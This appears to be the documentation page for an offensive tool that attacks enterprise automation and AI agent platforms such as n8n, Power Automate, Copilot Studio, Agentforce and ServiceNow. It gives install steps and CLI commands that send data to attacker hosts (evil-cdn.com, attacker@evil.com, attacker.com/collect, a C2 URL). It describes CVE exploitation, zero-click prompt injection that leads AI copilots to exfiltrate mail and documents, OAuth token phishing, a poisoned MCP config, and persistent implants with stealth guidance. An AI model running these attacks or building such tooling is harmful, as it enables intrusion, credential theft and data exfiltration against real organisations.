Enterprise No-Code/Low-Code Agent Platform Exploitation Engine — targets n8n, Zapier, Make.com, Microsoft Power Automate, Salesforce Agentforce/Einstein, Microsoft Copilot Studio, and ServiceNow Now Assist. 15+ CVEs and TTPs covering unauth RCE, OAuth token harvest, and connector exfiltration chains.
# Clone and install $ git clone https://github.com/RichardBarron27/red-specter-specter-relay $ cd red-specter-specter-relay $ pip install -e . # Verify $ specter-relay --version specter-relay, version 1.0.0 # Initialise gate authentication $ specter-relay auth init $ specter-relay auth create-scope --target https://target.example.com $ specter-relay auth status
| Gate | Subsystems Enabled | Requirement |
|---|---|---|
| OPEN | SURVEY, HARVEST, REPORT | No key required — passive enumeration only |
| INJECT | + INJECT, HIJACK, CHAIN, EXFIL (canary staging) | Ed25519 INJECT signature + --override flag |
| UNLEASHED | + PERSIST (rogue implants), EXFIL (live data transmission) | Ed25519 UNLEASHED signature + --i-understand-this-is-live-fire flag |
$ specter-relay full --target https://target.example.com --operator red Options: --target TEXT Target platform URL (repeat for multiple) --operator TEXT Operator handle for report attribution --gate TEXT OPEN | INJECT | UNLEASHED [default: OPEN] --key PATH Path to NIGHTFALL Ed25519 private key --output TEXT text | json | markdown [default: text] --out-dir PATH Report output directory [default: .] --verbose Verbose subsystem output
| Command | Gate | Description |
|---|---|---|
specter-relay survey | OPEN | Fingerprint platforms, detect versions, assess CVE applicability. |
specter-relay harvest | OPEN | Extract credentials and secrets from exported workflow blueprints. |
specter-relay inject | INJECT | Build and fire CVE exploitation payloads. |
specter-relay hijack | INJECT | CoPhish OAuth token theft, multi-tenant Entra app, Zapier MCP dump. |
specter-relay chain | INJECT | Trust graph escalation — AgentFlayer, session smuggling chains. |
specter-relay persist | UNLEASHED | Deploy rogue implants in n8n, Power Automate, Copilot Studio. |
specter-relay exfil | UNLEASHED | Live data extraction via trusted enterprise connectors. |
specter-relay report | OPEN | Generate Ed25519-signed RLY-{hex12} engagement report. |
# Survey — fingerprint platforms $ specter-relay survey --target https://n8n.corp.com --target https://instance.service-now.com # Harvest — extract credentials from exported blueprints $ specter-relay harvest my_workflow.json $ specter-relay harvest power_platform_solution.zip # Inject — build CVE payloads (INJECT gate) $ specter-relay inject --platform n8n --cve CVE-2026-21858 --target https://n8n.corp.com $ specter-relay inject --platform copilot_studio --cve CVE-2025-32711 # Hijack — CoPhish OAuth campaign setup (INJECT gate) $ specter-relay hijack cophish --bot-name "SupportBot" $ specter-relay hijack zapier-mcp # Chain — trust graph escalation (INJECT gate) $ specter-relay chain agentflayer $ specter-relay chain session-smuggling --endpoint https://a2a.corp.com # Persist — deploy rogue implants (UNLEASHED required) $ specter-relay persist n8n-cron-rearm --c2 https://c2.example.com $ specter-relay persist copilot-cross-tenant \ --victim-tenant TENANT_ID --attacker-tenant ATTACKER_ID # Exfil — live data extraction (UNLEASHED required) $ specter-relay exfil agentforce \ --sf-instance https://myorg.salesforce.com --exfil-domain evil-cdn.com $ specter-relay exfil power-automate --recipient attacker@evil.com # Generate signed report $ specter-relay report --target https://target.example.com --operator red
Content-Type confusion in n8n's webhook handler allows an unauthenticated attacker to achieve remote code execution. Sending a crafted multipart/form-data request with a malformed boundary causes the webhook processor to evaluate attacker-controlled content as a Node.js expression. No authentication, no prerequisites — immediate shell on n8n host. Affected: n8n < 1.88.0.
# PoC — generate Ni8mare payload $ specter-relay inject --platform n8n --cve CVE-2026-21858 \ --target https://n8n.corp.com --mode poc
n8n's Python Code node executes via Pyodide (WebAssembly Python). A ctypes-based technique exploits the boundary between Pyodide's WASM sandbox and the host Node.js process, gaining access to the host filesystem and environment. Affected: n8n 1.x with Python Code node enabled.
Unsanitised user input passed to n8n's expression evaluator ($evaluateExpression()) in certain workflow node parameters allows full JavaScript execution within the n8n worker process. Can be triggered via webhook input, form submissions, or crafted workflow JSON imported by a privileged user.
Zero-click email injection against Microsoft 365 Copilot. A crafted email with hidden instructions in HTML comments or zero-width Unicode characters causes Copilot to execute attacker instructions when the target's Copilot reads or summarises the email. The injected instructions can exfiltrate email content, calendar data, and SharePoint documents to an attacker-controlled endpoint using Copilot's own connector access. No user interaction required beyond email delivery.
# Build EchoLeak payload $ specter-relay inject --platform copilot_studio --cve CVE-2025-32711 \ --exfil-endpoint https://attacker.com/collect --mode poc
Copilot Studio bots with SharePoint connector access can be instructed via prompt injection to enumerate and exfiltrate SharePoint document libraries, lists, and site pages. The SharePoint connector operates with the delegated permissions of the bot's service account, typically a highly privileged enterprise account. Exfiltrated data is relayed via the bot's response channel or an HTTP action connector.
Second-order injection against ServiceNow Now Assist. A low-privilege user seeds a directive into a ServiceNow record (incident, task, knowledge article). When a Now Assist agent processes the record, the embedded directive executes with the agent's privileges — bypassing MFA and SSO controls because the agent session is already authenticated. Can escalate from basic user to privileged workflow execution.
Salesforce Agentforce's Web-to-Lead feature allows embedding a Copilot bot in public web forms. The CSP whitelist for these embedded bots includes domains that may have expired or been abandoned by their original registrant. By registering an expired domain from the CSP allowlist, an attacker can host an exfiltration endpoint that receives data the Agentforce bot is instructed to transmit — bypassing CSP entirely.
Copilot Studio bots can be configured with a Sign-in topic that initiates OAuth flows. By deploying a lure bot with a crafted Sign-in topic, the attacker obtains OAuth tokens from users who authenticate to the bot. The MultiTenantApp attack uses an attacker-controlled Entra application to harvest tokens across multiple tenants via a single consent URL.
A cross-platform attack chain demonstrated by Zenity at Black Hat 2025. A single crafted document or email triggers a cascade across multiple enterprise automation platforms simultaneously — n8n webhook → Power Automate connector → Copilot Studio bot — escalating from document injection to full tenant access without any user interaction at any stage.
Multi-platform fingerprinting using httpx async HTTP with TLS fingerprinting and response header analysis. PlatformScanner identifies platform, version, and CVE applicability for all 7 target platforms. probe_servicenow_agent_discovery() queries the Now Assist discovery API. probe_power_automate_desktop_secrets() checks for credential disclosure in %TEMP% paths. scan_range() takes a CIDR range and returns a combined SurveyResult. Version detection uses header fingerprints, known API endpoint responses, and version-specific error messages.
BlueprintExtractor parses exported workflow formats: n8n JSON, Zapier task history ZIP, Make.com blueprint JSON, Power Platform solution ZIP, and MCP server config.json. Secret pattern matching covers 20+ credential types: API keys, OAuth client secrets, Basic auth credentials, database connection strings, webhook URLs with embedded tokens, and platform-specific service account credentials. build_mcp_json_harvest_payload() generates a poisoned MCP server config that exfiltrates environment variables on first connection.
All exploit builders return InjectPayload objects with payload, headers, method, content_type, and wmd_class fields. PlatformExploiter.fire(target_url, inject) delivers the payload using httpx. Implemented exploits: Ni8mare webhook confusion, N8scape Pyodide sandbox escape, expression injection, EchoLeak zero-click email injection, ShareLeak connector exfil, ServiceNow second-order injection, Agentforce Prompt Mines, Power Automate secrets disclosure, ForcedLeak CSP whitelist bypass, and Zenity DLP bypass quartet (4 techniques).
CophishTopic generates Copilot Studio Sign-in topic JSON for bot deployment. MultiTenantApp builds an Entra multi-tenant application manifest and OAuth consent URL for cross-tenant token harvest. OAuthHijacker orchestrates full CoPhish campaigns and Entra multi-tenant attacks. build_zapier_mcp_credential_dump() generates a credential-harvesting MCP server config targeting Zapier's MCP integration. All payloads are structured JSON suitable for direct deployment.
TrustGraphAttack builds a NetworkX DiGraph where nodes are AgentNode objects (platform, privilege_level, agent_type, tenant_id) and edges represent trust relationships with exploitability weights. find_escalation_paths(start_node, min_target_privilege) returns all directed paths from a low-privilege start node to high-privilege targets. build_agentflayer_chain(platforms) constructs the Zenity Black Hat 2025 cross-platform cascade. build_agent_session_smuggling(a2a_endpoint) builds a stateful A2A injection payload (Unit42 PAN 2026). Exports to_json_ld() for structured reporting.
Eight implant strategies gated behind UNLEASHED: n8n_cron_rearm (cron workflow that re-deploys on deletion), n8n_self_healing_webhook (webhook with re-registration logic), power_automate_shadow_env (environment variable persistence), power_automate_flow_trigger (hidden trigger flow), copilot_cross_tenant_share (cross-tenant bot access), copilot_rogue_topic (hidden topic in existing bot), servicenow_workflow_backdoor (hidden workflow activity), zapier_webhook_relay (covert Zap exfil channel). Each strategy includes survival notes, rearm triggers, and stealth guidance.
ConnectorExfil implements six exfiltration chains targeting connectors that are trusted by DLP policies: ForcedLeak via Agentforce CSP whitelist, ShareLeak via Copilot Studio SharePoint connector, Power Automate email relay, n8n HTTP request node, unblockable exfil via approved analytics domains, and a covert ServiceNow webhook relay. CspWhitelistHunter scans Agentforce bot deployments for expired or registerable CSP allowlist domains, scoring each by registration viability and data access scope.
All reports are Ed25519-signed RLY-{hex12} format. The signing key is stored at ~/.red-specter/specter-relay/operator.key (mode 0o600). The report includes:
| Field | Contents |
|---|---|
report_id | RLY-{12 hex chars} unique identifier |
timestamp | ISO-8601 UTC |
target | Target platform URL |
operator | Operator handle |
signature | Ed25519 signature over report body (hex) |
findings | List of RelayFinding objects with subsystem, title, severity, gate, and evidence |
wmd_classes | Activated WMD classes: nocode_agent_rce / tenant_oauth_harvest / connector_exfil_chain |
mitre_atlas | AML.T0051/T0054/T0020/T0043/T0048/T0049 with finding mappings |
owasp | LLM01/LLM02/LLM06/LLM08 + Agentic AST01–AST09 + MCP Top 10 2026 |
risk_score | 0.0–1.0 composite score based on finding severity and platform privilege |
| Framework | Technique / Category | Subsystem |
|---|---|---|
| ATLAS AML.T0051 | LLM Prompt Injection | INJECT, CHAIN |
| ATLAS AML.T0054 | LLM Jailbreak | INJECT |
| ATLAS AML.T0020 | Poison Training Data | PERSIST |
| ATLAS AML.T0043 | Craft Adversarial Data | INJECT, CHAIN |
| ATLAS AML.T0048 | Exfiltration via ML Inference API | EXFIL |
| ATLAS AML.T0049 | Evade ML Model | PERSIST |
| OWASP LLM01 | Prompt Injection | INJECT, CHAIN |
| OWASP LLM02 | Sensitive Information Disclosure | HARVEST, EXFIL |
| OWASP LLM06 | Excessive Agency | CHAIN, PERSIST |
| OWASP LLM08 | Excessive Permissions | HIJACK, EXFIL |
| Agentic AST01–AST09 | Agentic Security Top 10 | All subsystems |
| MCP Top 10 2026 | Tool Poisoning, Credential Exposure | HARVEST, HIJACK |
| Reference | Relevance |
|---|---|
| CVE-2026-21858 "Ni8mare" (CVSS 10.0) | n8n Content-Type confusion unauth RCE — INJECT primary exploit |
| CVE-2025-68668 "N8scape" (CVSS 9.9) | Pyodide ctypes sandbox escape — INJECT secondary n8n vector |
| CVE-2025-32711 "EchoLeak" (CVSS 9.3) | M365 Copilot zero-click RAG email injection — INJECT Copilot Studio |
| CVE-2025-12420 (CVSS 9.3) | ServiceNow second-order agent injection, MFA/SSO bypass |
| ForcedLeak (CVSS 9.4) | Agentforce Web-to-Lead expired CSP domain exfil — EXFIL engine |
| Zenity AgentFlayer (Black Hat 2025) | Zero-click cross-platform chain — CHAIN agentflayer attack |
| Unit42 Agent Session Smuggling (PAN 2026) | Stateful A2A injection — CHAIN session-smuggling |
| Zenity DLP Bypass Quartet (2025) | 4-technique Power Platform DLP bypass — INJECT/PERSIST |
| OWASP Agentic Security Top 10 (2026) | AST01–AST09 framework — REPORT mapping |
| MCP Security Top 10 2026 | Tool Poisoning, Credential Exposure — HARVEST/HIJACK |